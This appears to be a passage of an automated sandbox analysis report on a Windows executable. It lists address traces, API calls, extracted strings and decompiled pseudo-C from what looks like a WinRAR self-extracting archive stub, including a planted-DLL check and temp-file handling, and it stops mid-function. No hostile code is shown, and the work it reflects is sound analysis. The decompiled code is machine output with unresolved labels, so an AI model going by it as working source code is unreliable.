0x00e7b56d
0x00e7b570
0x00e7b57d
0x00e7b57f
0x00e7b582
0x00e7b584
0x00e7b60f
0x00e7b58a
0x00e7b58a
0x00e7b591
0x00e7b597
0x00e7b599
0x00e7b5a6
0x00e7b5a6
0x00e7b5b2
0x00e7b5be
0x00e7b5ca
0x00e7b5d5
0x00e7b5dc
0x00e7b5e1
0x00e7b5ff
0x00e7b602
0x00e7b607
0x00e7b607
0x00e7b616
0x00e7b62a
0x00e7b63b
0x00e7b640
0x00e7b642
0x00e7b67c
0x00e7b67f
0x00000000
0x00e7b644
0x00e7b64c
0x00e7b652
0x00e7b652
0x00e7b652
0x00e7b656
0x00e7b659
0x00e7b659
0x00e7b65c
0x00000000
0x00000000
0x00e7b660
0x00e7b669
0x00e7b66a
0x00e7b66d
0x00e7b670
0x00000000
0x00000000
0x00000000
0x00e7b670
0x00e7b675
0x00e7b682
0x00e7b682
0x00e7b686
0x00e7b689
0x00e7b692
0x00e7b692
0x00000000
0x00e7b686
0x00e7b642
0x00e7b451
0x00e7b453
0x00000000
0x00000000
0x00e7b469
0x00e7b46e
0x00e7b477
0x00e7b47c
0x00e7b486
0x00e7b488
0x00e7b48f
0x00e7b494
0x00e7b497
0x00e7b499
0x00e7b49b
0x00e7b4a1
0x00e7b4a4
0x00e7b4a6
0x00e7b4a6
0x00e7b4a4
0x00e7b4a9
0x00e7b4a9
0x00e7b4a9
0x00e7b4b3
0x00e7b4b8
0x00000000
0x00e7b4b8
0x00e7b42f
0x00e7b435
0x00e7b438
0x00e7b43b
0x00000000
0x00000000
0x00e7b43d
0x00e7b43f
0x00000000
0x00e7b405
0x00e7b405
0x00e7b40b
0x00e7b40e
0x00e7b415
0x00e7b417
0x00000000
0x00e7b417
0x00e7b410
0x00e7b413
0x00000000
0x00000000
0x00000000
0x00e7b413
0x00e7b310
0x00e7b312
0x00e7b313
0x00e7b315
0x00e7b7e7
0x00e7b7e7
0x00e7b7ee
0x00000000
0x00000000
0x00e7b7f4
0x00e7b7f6
0x00000000
0x00000000
0x00e7b801
0x00e7b80f
0x00e7b815
0x00e7b81b
0x00e7b81e
0x00e7b829
0x00e7b833
0x00e7b833
0x00e7b838
0x00e7b83b
0x00e7b820
0x00e7b820
0x00e7b820
0x00e7b844
0x00e7b852
0x00000000
0x00e7b852
0x00e7b30e
0x00e7b2f1
0x00e7b2f2
0x00e7b2f9
0x00000000
0x00000000
0x00000000
0x00e7b2f9
0x00e7b23f
0x00e7b246
0x00000000
0x00e7b24c
0x00e7b24c
0x00e7b253
0x00e7b258
0x00e7b25a
0x00e7b269
0x00e7b271
0x00e7b274
0x00e7b2c3
0x00e7b2c3
0x00e7b2ca
0x00e7b2cc
0x00e7b2cc
0x00e7b27c
0x00e7b283
0x00000000
0x00000000
0x00e7b292
0x00e7b298
0x00e7b29a
0x00000000
0x00e7b2a0
0x00e7b2a5
0x00e7b2ab
0x00e7b2ad
0x00e7b2b3
0x00e7b2bd
0x00e7b2bd
0x00000000
0x00e7b2ad
0x00e7b29a
0x00000000
0x00e7b2c3
0x00e7b246
0x00e7b1c9
0x00e7b1c9
0x00e7b1cc
0x00e7b207
0x00e7b208
0x00e7b20f
0x00e7b215
0x00000000
0x00000000
0x00e7b217
0x00e7b21e
0x00000000
0x00000000
0x00000000
0x00e7b21e
0x00e7b1ce
0x00e7b1d1
0x00e7b1ea
0x00e7b1ef
0x00e7b1f1
0x00e7b1fd
0x00e7b1fd
0x00000000
0x00e7b1f1
0x00000000
0x00e7b1d1
0x00e7b1a8
0x00e7b1aa
0x00000000

APIs

__EH_prolog.LIBCMT ref: 00E7B175

Part of subcall function 00E6130B: GetDlgItem.USER32(00000000,00003021), ref: 00E6134F
Part of subcall function 00E6130B: SetWindowTextW.USER32(00000000,00E935B4), ref: 00E61365

Strings

-el -s2 "-d%s" "-sp%s", xrefs: 00E7B512
__tmp_rar_sfx_access_check_%u, xrefs: 00E7B45C
<, xrefs: 00E7B52B
LICENSEDLG, xrefs: 00E7BA02
"%s"%s, xrefs: 00E7B6B4
@, xrefs: 00E7B538
STARTDLG, xrefs: 00E7B194
C:\Users\user\Desktop, xrefs: 00E7B570
winrarsfxmappingfile.tmp, xrefs: 00E7B54D

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: H_prologItemTextWindow
String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
API String ID: 810644672-1650746426
Opcode ID: 53d998bcedd5239c365cd555849ae3aebd92975b7758ae566fa5ade94ede85ad
Instruction ID: 58c8e9972f5220b163ddbbb04457b3315bdb513dc2bd0bba532a37d2e2cd3bf4
Opcode Fuzzy Hash: 53d998bcedd5239c365cd555849ae3aebd92975b7758ae566fa5ade94ede85ad
Instruction Fuzzy Hash: FF421970944344BEEB21AB719C4AFFE3BBCAB0A704F049069F609B61D2DB755D49CB21

Uniqueness

Uniqueness Score: -1.00%

Function 00E703AA Relevance: 98.3, APIs: 22, Strings: 34, Instructions: 317
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 71%

			E00E703AA(void* __edx, CHAR* _a4, CHAR* _a8, CHAR* _a12, CHAR* _a16, CHAR* _a20, CHAR* _a24, CHAR* _a28, CHAR* _a32, CHAR* _a36, CHAR* _a40, CHAR* _a44, CHAR* _a48, CHAR* _a52, CHAR* _a56, CHAR* _a60, CHAR* _a64, CHAR* _a68, CHAR* _a72, CHAR* _a76, CHAR* _a80, CHAR* _a84, CHAR* _a88, CHAR* _a92, CHAR* _a96, CHAR* _a100, CHAR* _a104, CHAR* _a108, CHAR* _a112, CHAR* _a116, CHAR* _a120, CHAR* _a124, CHAR* _a128, CHAR* _a132, CHAR* _a136, CHAR* _a140, CHAR* _a144, CHAR* _a148, CHAR* _a152, CHAR* _a156, CHAR* _a160, CHAR* _a164, CHAR* _a168, CHAR* _a172, CHAR* _a176, CHAR* _a180, CHAR* _a184, CHAR* _a188, CHAR* _a192, CHAR* _a196, CHAR* _a200, CHAR* _a204, CHAR* _a208, CHAR* _a212, CHAR* _a216, CHAR* _a220, CHAR* _a224, CHAR* _a228, CHAR* _a232, CHAR* _a236, CHAR* _a240, char _a244, char _a248, short _a752, short _a756, char _a764, short _a768, char _a4844, char _a4848, void _a4856, char _a4860, short _a4864, char _a9148, char _a9156, void _a13256, signed char _a46028) {
				long _v0;
				long _v8;
				char* _t115;
				void* _t123;
				int _t127;
				long _t138;
				int _t164;
				_Unknown_base(*)()* _t173;
				signed char _t180;
				intOrPtr _t194;
				long _t196;
				void* _t197;
				_Unknown_base(*)()* _t198;
				struct HINSTANCE__* _t200;
				signed int _t202;
				signed int _t204;
				void* _t205;
				_Unknown_base(*)()* _t206;
				signed int _t207;
				int _t208;
				void* _t210;

				E00E7E630();
				_push(_t207);
				_t180 = 0;
				_t200 = GetModuleHandleW(L"kernel32");
				if(_t200 == 0) {
					L5:
					_t115 =  *0xe9e080; // 0xe93b54
					_t208 = _t207 | 0xffffffff;
					_a4 = L"version.dll";
					_t201 = 0x800;
					_a8 = L"DXGIDebug.dll";
					_a12 = L"sfc_os.dll";
					_a16 = L"SSPICLI.DLL";
					_a20 = L"rsaenh.dll";
					_a24 = L"UXTheme.dll";
					_a28 = L"dwmapi.dll";
					_a32 = L"cryptbase.dll";
					_a36 = L"lpk.dll";
					_a40 = L"usp10.dll";
					_a44 = L"clbcatq.dll";
					_a48 = L"comres.dll";
					_a52 = L"ws2_32.dll";
					_a56 = L"ws2help.dll";
					_a60 = L"psapi.dll";
					_a64 = L"ieframe.dll";
					_a68 = L"ntshrui.dll";
					_a72 = L"atl.dll";
					_a76 = L"setupapi.dll";
					_a80 = L"apphelp.dll";
					_a84 = L"userenv.dll";
					_a88 = L"netapi32.dll";
					_a92 = L"shdocvw.dll";
					_a96 = L"crypt32.dll";
					_a100 = L"msasn1.dll";
					_a104 = L"cryptui.dll";
					_a108 = L"wintrust.dll";
					_a112 = L"shell32.dll";
					_a116 = L"secur32.dll";
					_a120 = L"cabinet.dll";
					_a124 = L"oleaccrc.dll";
					_a128 = L"ntmarta.dll";
					_a132 = L"profapi.dll";
					_a136 = L"WindowsCodecs.dll";
					_a140 = L"srvcli.dll";
					_a144 = L"cscapi.dll";
					_a148 = L"slc.dll";
					_a152 = L"imageres.dll";
					_a156 = L"dnsapi.DLL";
					_a160 = L"iphlpapi.DLL";
					_a164 = L"WINNSI.DLL";
					_a168 = L"netutils.dll";
					_a172 = L"mpr.dll";
					_a176 = L"devrtl.dll";
					_a180 = L"propsys.dll";
					_a184 = L"mlang.dll";
					_a188 = L"samcli.dll";
					_a192 = L"samlib.dll";
					_a196 = L"wkscli.dll";
					_a200 = L"dfscli.dll";
					_a204 = L"browcli.dll";
					_a208 = L"rasadhlp.dll";
					_a212 = L"dhcpcsvc6.dll";
					_a216 = L"dhcpcsvc.dll";
					_a220 = L"XmlLite.dll";
					_a224 = L"linkinfo.dll";
					_a228 = L"cryptsp.dll";
					_a232 = L"RpcRtRemote.dll";
					_a236 = L"aclui.dll";
					_a240 = L"dsrole.dll";
					_a244 = L"peerdist.dll";
					if( *_t115 == 0x78) {
						L14:
						GetModuleFileNameW(0,  &_a768, _t201);
						E00E70131( &_a9156, E00E6BE89(_t223,  &_a768), _t201);
						_t194 = 0;
						_t202 = 0;
						do {
							if(E00E6AEE5() < 0x600) {
								_t123 = 0;
								__eflags = 0;
							} else {
								_t123 = E00E70360( *((intOrPtr*)(_t210 + 0x14 + _t202 * 4))); // executed
							}
							if(_t123 == 0) {
								L20:
								_push(0x800);
								E00E6BEFF(_t227,  &_a768,  *((intOrPtr*)(_t210 + 0x18 + _t202 * 4)));
								_t127 = GetFileAttributesW( &_a756); // executed
								if(_t127 != _t208) {
									_t194 =  *((intOrPtr*)(_t210 + 0x14 + _t202 * 4));
									L24:
									if(_t180 != 0) {
										L30:
										_t234 = _t194;
										if(_t194 == 0) {
											return _t127;
										}
										E00E6BED3(_t234,  &_a764);
										if(E00E6AEE5() < 0x600) {
											_push( &_a9156);
											_push( &_a764);
											E00E63F8F( &_a4860, 0x864, L"Please remove %s from %s folder. It is unsecure to run %s until it is done.", _t194);
											_t210 = _t210 + 0x18;
											_t127 = AllocConsole();
											__eflags = _t127;
											if(_t127 != 0) {
												__imp__AttachConsole(GetCurrentProcessId());
												_t138 = E00E83883( &_a4856);
												WriteConsoleW(GetStdHandle(0xfffffff4),  &_a4856, _t138,  &_v8, 0);
												Sleep(0x2710);
												_t127 = FreeConsole();
											}
										} else {
											E00E70360(L"dwmapi.dll");
											E00E70360(L"uxtheme.dll");
											_push( &_a9148);
											_push( &_a756);
											E00E63F8F( &_a4848, 0x864, E00E6E0AC(_t182, 0xf1), _t194);
											_t210 = _t210 + 0x18;
											_t127 = E00E7A195(0,  &_a4844, E00E6E0AC(_t182, 0xf0), 0x30);
										}
										ExitProcess(0);
									}
									_t204 = 0;
									while(1) {
										_push(0x800);
										E00E6BEFF(0,  &_a764,  *((intOrPtr*)(_t210 + 0x38 + _t204 * 4)));
										_t127 = GetFileAttributesW( &_a752);
										if(_t127 != _t208) {
											break;
										}
										_t204 = _t204 + 1;
										if(_t204 < 0x35) {
											continue;
										}
										goto L30;
									}
									_t100 = _t204 * 4; // 0xe93c6c
									_t194 =  *((intOrPtr*)(_t210 + _t100 + 0x34));
									goto L30;
								}
							} else {
								_t127 = CompareStringW(0x400, 0x1001,  *(_t210 + 0x20 + _t202 * 4), _t208, L"DXGIDebug.dll", _t208); // executed
								_t227 = _t127 - 2;
								if(_t127 != 2) {
									goto L21;
								}
								goto L20;
							}
							L21:
							_t202 = _t202 + 1;
						} while (_t202 < 8);
						goto L24;
					}
					_t196 = E00E873CD(_t182, _t115);
					_pop(_t182);
					if(_t196 == 0) {
						goto L14;
					}
					GetModuleFileNameW(0,  &_a4864, 0x800);
					_t205 = CreateFileW( &_a4864, 0x80000000, 1, 0, 3, 0, 0);
					if(_t205 == _t208 || SetFilePointer(_t205, _t196, 0, 0) != _t196) {
						L13:
						CloseHandle(_t205);
						_t201 = 0x800;
						goto L14;
					} else {
						_t164 = ReadFile(_t205,  &_a13256, 0x7ffe,  &_v0, 0);
						_t222 = _t164;
						if(_t164 == 0) {
							goto L13;
						}
						_t182 = 0;
						_push(0x104);
						 *((short*)(_t210 + 0x33dc + (_v0 >> 1) * 2)) = 0;
						_push( &_a248);
						_push( &_a13256);
						while(1) {
							_t197 = E00E6FEB3(_t222);
							_t223 = _t197;
							if(_t197 == 0) {
								goto L13;
							}
							E00E70360( &_a248);
							_push(0x104);
							_push( &_a244);
							_push(_t197);
						}
						goto L13;
					}
				}
				_t173 = GetProcAddress(_t200, "SetDllDirectoryW");
				_t180 = _a46028;
				_t198 = _t173;
				if(_t198 != 0) {
					asm("sbb ecx, ecx");
					_t182 = _t198;
					 *0xe93260( ~(_t180 & 0x000000ff) & 0x00e935b4);
					 *_t198();
				}
				_t206 = GetProcAddress(_t200, "SetDefaultDllDirectories");
				if(_t206 != 0) {
					_t182 = _t206;
					 *0xe93260(((0 | _t180 == 0x00000000) - 0x00000001 & 0xfffff800) + 0x1000);
					 *_t206();
					_t180 = 1;
				}
				goto L5;
			}

0x00e703af
0x00e703b5
0x00e703bd
0x00e703c5
0x00e703c9
0x00e7042f
0x00e7042f
0x00e70434
0x00e70437
0x00e7043f
0x00e70444
0x00e7044c
0x00e70457
0x00e7045f
0x00e70467
0x00e7046f
0x00e70477
0x00e7047f
0x00e70487
0x00e7048f
0x00e70497
0x00e7049f
0x00e704a7
0x00e704af
0x00e704b7
0x00e704bf
0x00e704c7
0x00e704cf
0x00e704d7
0x00e704df
0x00e704e7
0x00e704ef
0x00e704f7
0x00e704ff
0x00e70507
0x00e7050f
0x00e70517
0x00e70522
0x00e7052d
0x00e70538
0x00e70543
0x00e7054e
0x00e70559
0x00e70564
0x00e7056f
0x00e7057a
0x00e70585
0x00e70590
0x00e7059b
0x00e705a6
0x00e705b1
0x00e705bc
0x00e705c7
0x00e705d2
0x00e705dd
0x00e705e8
0x00e705f3
0x00e705fe
0x00e70609
0x00e70614
0x00e7061f
0x00e7062a
0x00e70635
0x00e70640
0x00e7064b
0x00e70656
0x00e70661
0x00e7066c
0x00e70677
0x00e70682
0x00e7068d
0x00e7075f
0x00e7076a
0x00e70787
0x00e7078c
0x00e7078e
0x00e70790
0x00e7079a
0x00e707a7
0x00e707a7
0x00e7079c
0x00e707a0
0x00e707a0
0x00e707ab
0x00e707cd
0x00e707cd
0x00e707de
0x00e707eb
0x00e707f3
0x00e707fd
0x00e70801
0x00e70803
0x00e7083b
0x00e7083b
0x00e7083d
0x00e70954
0x00e70954
0x00e7084b
0x00e7085a
0x00e708c9
0x00e708d1
0x00e708e5
0x00e708ea
0x00e708ed
0x00e708f3
0x00e708f5
0x00e708fe
0x00e70913
0x00e7092b
0x00e70936
0x00e7093c
0x00e7093c
0x00e7085c
0x00e70861
0x00e7086b
0x00e70877
0x00e7087f
0x00e70899
0x00e7089e
0x00e708b8
0x00e708b8
0x00e70944
0x00e70944
0x00e70805
0x00e70807
0x00e70807
0x00e70818
0x00e70825
0x00e7082d
0x00000000
0x00000000
0x00e7082f
0x00e70833
0x00000000
0x00000000
0x00000000
0x00e70835
0x00e70837
0x00e70837
0x00000000
0x00e70837
0x00e707ad
0x00e707c2
0x00e707c8
0x00e707cb
0x00000000
0x00000000
0x00000000
0x00e707cb
0x00e707f5
0x00e707f5
0x00e707f6
0x00000000
0x00e707fb
0x00e70699
0x00e7069b
0x00e7069e
0x00000000
0x00000000
0x00e706af
0x00e706d1
0x00e706d5
0x00e70753
0x00e70754
0x00e7075a
0x00000000
0x00e706e7
0x00e706fc
0x00e70702
0x00e70704
0x00000000
0x00000000
0x00e7070c
0x00e7070e
0x00e70713
0x00e70722
0x00e7072a
0x00e70748
0x00e7074d
0x00e7074f
0x00e70751
0x00000000
0x00000000
0x00e70735
0x00e7073a
0x00e70746
0x00e70747
0x00e70747
0x00000000
0x00e70748
0x00e706d5
0x00e703d1
0x00e703d7
0x00e703de
0x00e703e2
0x00e703e9
0x00e703f2
0x00e703f4
0x00e703fa
0x00e703fa
0x00e70408
0x00e7040c
0x00e70423
0x00e70425
0x00e7042b
0x00e7042d
0x00e7042d
0x00000000

APIs

GetModuleHandleW.KERNEL32(kernel32), ref: 00E703BF
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00E703D1
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00E70402
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00E706AF
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E706CB
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E706DD
ReadFile.KERNEL32(00000000,?,00007FFE,00E93BA4,00000000), ref: 00E706FC
CloseHandle.KERNEL32(00000000), ref: 00E70754
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00E7076A
CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 00E707C2
GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 00E707EB
GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 00E70825

Part of subcall function 00E70360: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00E7037B
Part of subcall function 00E70360: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00E6EE61,Crypt32.dll,00000000,00E6EEE5,?,?,00E6EEC7,?,?,?), ref: 00E7039D

_swprintf.LIBCMT ref: 00E70899
_swprintf.LIBCMT ref: 00E708E5

Part of subcall function 00E63F8F: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E63FA2

AllocConsole.KERNEL32 ref: 00E708ED
GetCurrentProcessId.KERNEL32 ref: 00E708F7
AttachConsole.KERNEL32(00000000), ref: 00E708FE
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00E70924
WriteConsoleW.KERNEL32(00000000), ref: 00E7092B
Sleep.KERNEL32(00002710), ref: 00E70936
FreeConsole.KERNEL32 ref: 00E7093C
ExitProcess.KERNEL32 ref: 00E70944

Strings

?, xrefs: 00E70585
uxtheme.dll, xrefs: 00E70866
D=, xrefs: 00E704CF
>, xrefs: 00E70564
p@, xrefs: 00E7061F
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 00E708D3
SetDefaultDllDirectories, xrefs: 00E703FC
<?, xrefs: 00E70590
X>, xrefs: 00E7052D
X@, xrefs: 00E70614
p?, xrefs: 00E705A6
|<, xrefs: 00E70487
P<, xrefs: 00E70477
(>, xrefs: 00E70517
`=, xrefs: 00E704D7
4=, xrefs: 00E704C7
SetDllDirectoryW, xrefs: 00E703CB
T;, xrefs: 00E7042F
kernel32, xrefs: 00E703B8
<, xrefs: 00E70467
@@, xrefs: 00E70609
8<, xrefs: 00E7046F
p>, xrefs: 00E70538
?, xrefs: 00E705DD
(@, xrefs: 00E705FE
T?, xrefs: 00E7059B
l<, xrefs: 00E70837
DXGIDebug.dll, xrefs: 00E70444, 00E707AE
0A, xrefs: 00E7066C
DA, xrefs: 00E70677
dwmapi.dll, xrefs: 00E7085C
@>, xrefs: 00E70522
\A, xrefs: 00E70682
x=, xrefs: 00E704DF

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
String ID: <$ ?$(>$(@$0A$4=$8<$<?$@>$@@$D=$DA$DXGIDebug.dll$P<$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T;$T?$X>$X@$\A$`=$dwmapi.dll$kernel32$l<$p>$p?$p@$uxtheme.dll$x=$|<$>$?
API String ID: 1201351596-2360068917
Opcode ID: 333b0d0ed21e54427b9900254b9cb410ba8848e9a8257b5fdd5b6aa0363f3c4c
Instruction ID: c856df87e9b99c5883fdaa877afccbd1fdc52c771a4b131ee22f37cc68119d95
Opcode Fuzzy Hash: 333b0d0ed21e54427b9900254b9cb410ba8848e9a8257b5fdd5b6aa0363f3c4c
Instruction Fuzzy Hash: 6ED155B1508384EFDB30DF61D84ABDFB7E8ABC4704F50691EF589B6150D7B08A498B62

Uniqueness

Uniqueness Score: -1.00%

Function 00E7C085 Relevance: 35.4, APIs: 16, Strings: 4, Instructions: 429
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 55%

			E00E7C085() {
				intOrPtr _t228;
				void* _t233;
				intOrPtr _t289;
				signed int _t304;
				void* _t308;
				signed int _t309;
				void* _t313;

				E00E7E554(E00E92323, _t313);
				_t228 = 0x1bd4c;
				E00E7E630();
				if( *((intOrPtr*)(_t313 + 0xc)) == 0) {
					L179:
					 *[fs:0x0] =  *((intOrPtr*)(_t313 - 0xc));
					return _t228;
				}
				_push(0x1000);
				_push(_t313 - 0x15);
				_push(_t313 - 0xd);
				_push(_t313 - 0x3508);
				_push(_t313 - 0xfd58);
				_push( *((intOrPtr*)(_t313 + 0xc)));
				_t228 = E00E7ACC6();
				 *((intOrPtr*)(_t313 + 0xc)) = 0x1bd4c;
				if(0x1bd4c != 0) {
					_t289 =  *((intOrPtr*)(_t313 + 0x10));
					do {
						_t233 = _t313 - 0x3508;
						_t308 = _t313 - 0x1bd58;
						_t304 = 6;
						goto L4;
						L6:
						while(E00E71AC4(_t313 - 0xfd58,  *((intOrPtr*)(0xe9e618 + _t309 * 4))) != 0) {
							_t309 = _t309 + 1;
							if(_t309 < 0xe) {
								continue;
							} else {
								goto L177;
							}
						}
						if(_t309 > 0xd) {
							goto L177;
						}
						switch( *((intOrPtr*)(_t309 * 4 +  &M00E7CD65))) {
							case 0:
								__eflags = _t289 - 2;
								if(__eflags == 0) {
									E00E7A004(_t313 - 0x7d50, 0x800);
									E00E6A690(E00E6BB55(__eflags, _t313 - 0x7d50, _t313 - 0x3508, _t313 - 0xdd58, 0x800), _t289, _t313 - 0x8d58, _t309);
									 *(_t313 - 4) = 0;
									E00E6A7CA(_t313 - 0x8d58, _t313 - 0xdd58);
									E00E67119(_t313 - 0x5d50);
									while(1) {
										_push(0);
										_t297 = _t313 - 0x8d58;
										_t251 = E00E6A71D(_t313 - 0x8d58, _t302, _t313 - 0x5d50);
										__eflags = _t251;
										if(_t251 == 0) {
											break;
										}
										SetFileAttributesW(_t313 - 0x5d50, 0);
										__eflags =  *(_t313 - 0x4d44);
										if(__eflags == 0) {
											L18:
											_t255 = GetFileAttributesW(_t313 - 0x5d50);
											__eflags = _t255 - 0xffffffff;
											if(_t255 == 0xffffffff) {
												continue;
											}
											_t257 = DeleteFileW(_t313 - 0x5d50);
											__eflags = _t257;
											if(_t257 != 0) {
												continue;
											} else {
												_t311 = 0;
												_push(0);
												goto L22;
												L22:
												E00E63F8F(_t313 - 0x1108, 0x800, L"%s.%d.tmp", _t313 - 0x5d50);
												_t315 = _t315 + 0x14;
												_t262 = GetFileAttributesW(_t313 - 0x1108);
												__eflags = _t262 - 0xffffffff;
												if(_t262 != 0xffffffff) {
													_t311 = _t311 + 1;
													__eflags = _t311;
													_push(_t311);
													goto L22;
												} else {
													_t265 = MoveFileW(_t313 - 0x5d50, _t313 - 0x1108);
													__eflags = _t265;
													if(_t265 != 0) {
														MoveFileExW(_t313 - 0x1108, 0, 4);
													}
													continue;
												}
											}
										}
										E00E6B6E7(_t297, __eflags, _t313 - 0x7d50, _t313 - 0x1108, 0x800);
										E00E6B3F7(__eflags, _t313 - 0x1108, 0x800);
										_t312 = E00E83883(_t313 - 0x7d50);
										__eflags = _t312 - 4;
										if(_t312 < 4) {
											L16:
											_t276 = E00E6BB15(_t313 - 0x3508);
											__eflags = _t276;
											if(_t276 != 0) {
												break;
											}
											L17:
											_t279 = E00E83883(_t313 - 0x5d50);
											__eflags = 0;
											 *((short*)(_t313 + _t279 * 2 - 0x5d4e)) = 0;
											E00E7F5F0(0x800, _t313 - 0x40, 0, 0x1e);
											_t315 = _t315 + 0x10;
											 *((intOrPtr*)(_t313 - 0x3c)) = 3;
											_push(0x14);
											_pop(_t282);
											 *((short*)(_t313 - 0x30)) = _t282;
											 *((intOrPtr*)(_t313 - 0x38)) = _t313 - 0x5d50;
											_push(_t313 - 0x40);
											 *0xec2074();
											goto L18;
										}
										_t287 = E00E83883(_t313 - 0x1108);
										__eflags = _t312 - _t287;
										if(_t312 > _t287) {
											goto L17;
										}
										goto L16;
									}
									 *(_t313 - 4) =  *(_t313 - 4) | 0xffffffff;
									E00E6A6A6(_t313 - 0x8d58);
								}
								goto L177;
							case 1:
								__eflags = __ebx;
								if(__ebx == 0) {
									__eax =  *0xebdc84;
									__eflags =  *0xebdc84;
									__ebx = __ebx & 0xffffff00 |  *0xebdc84 == 0x00000000;
									__eflags = __bl;
									if(__bl == 0) {
										__eax =  *0xebdc84;
										_pop(__ecx);
										_pop(__ecx);
									}
									__bh =  *((intOrPtr*)(__ebp - 0xd));
									__eflags = __bh;
									if(__eflags == 0) {
										__eax = __ebp + 0xc;
										_push(__ebp + 0xc);
										__esi = E00E7AE2A(__ecx, __edx, __eflags);
										__eax =  *0xebdc84;
									} else {
										__esi = __ebp - 0x3508;
									}
									__eflags = __bl;
									if(__bl == 0) {
										__edi = __eax;
									}
									__eax = E00E83883(__esi);
									__eax = __eax + __edi;
									_push(__eax);
									_push( *0xebdc84);
									__eax = E00E838AE(__ecx, __edx);
									__esp = __esp + 0xc;
									__eflags = __eax;
									if(__eax != 0) {
										 *0xebdc84 = __eax;
										__eflags = __bl;
										if(__bl != 0) {
											__ecx = 0;
											__eflags = 0;
											 *__eax = __cx;
										}
										__eax = E00E87458(__eax, __esi);
										_pop(__ecx);
										_pop(__ecx);
									}
									__eflags = __bh;
									if(__bh == 0) {
										__eax = L00E8389E(__esi);
									}
								}
								goto L177;
							case 2:
								__eflags = __ebx;
								if(__ebx == 0) {
									__ebp - 0x3508 = SetWindowTextW( *(__ebp + 8), __ebp - 0x3508);
								}
								goto L177;
							case 3:
								__eflags = __ebx;
								if(__ebx != 0) {
									goto L177;
								}
								__eflags =  *0xeaa472 - __di;
								if( *0xeaa472 != __di) {
									goto L177;
								}
								__eax = 0;
								__edi = __ebp - 0x3508;
								_push(0x22);
								 *(__ebp - 0x1108) = __ax;
								_pop(__eax);
								__eflags =  *(__ebp - 0x3508) - __ax;
								if( *(__ebp - 0x3508) == __ax) {
									__edi = __ebp - 0x3506;
								}
								__eax = E00E83883(__edi);
								__esi = 0x800;
								__eflags = __eax - 0x800;
								if(__eax >= 0x800) {
									goto L177;
								} else {
									__eax =  *__edi & 0x0000ffff;
									_push(0x5c);
									_pop(__ecx);
									__eflags = ( *__edi & 0x0000ffff) - 0x2e;
									if(( *__edi & 0x0000ffff) != 0x2e) {
										L52:
										__eflags = __ax - __cx;
										if(__ax == __cx) {
											L64:
											__ebp - 0x1108 = E00E70131(__ebp - 0x1108, __edi, __esi);
											__ebx = 0;
											__eflags = 0;
											L65:
											_push(0x22);
											_pop(__eax);
											__eax = __ebp - 0x1108;
											__eax = E00E81A6B(__ebp - 0x1108, __ebp - 0x1108);
											_pop(__ecx);
											_pop(__ecx);
											__eflags = __eax;
											if(__eax != 0) {
												__eflags =  *(__eax + 2) - __bx;
												if( *(__eax + 2) == __bx) {
													__ecx = 0;
													__eflags = 0;
													 *__eax = __cx;
												}
											}
											__eax = __ebp - 0x1108;
											__edi = 0xeaa472;
											E00E70131(0xeaa472, __ebp - 0x1108, __esi) = __ebp - 0x1108;
											__eax = E00E7AB60(__ebp - 0x1108, __esi); // executed
											__esi = GetDlgItem( *(__ebp + 8), 0x66);
											__ebp - 0x1108 = SetWindowTextW(__esi, __ebp - 0x1108); // executed
											__eax = SendMessageW(__esi, 0x143, __ebx, 0xeaa472); // executed
											__eax = __ebp - 0x1108;
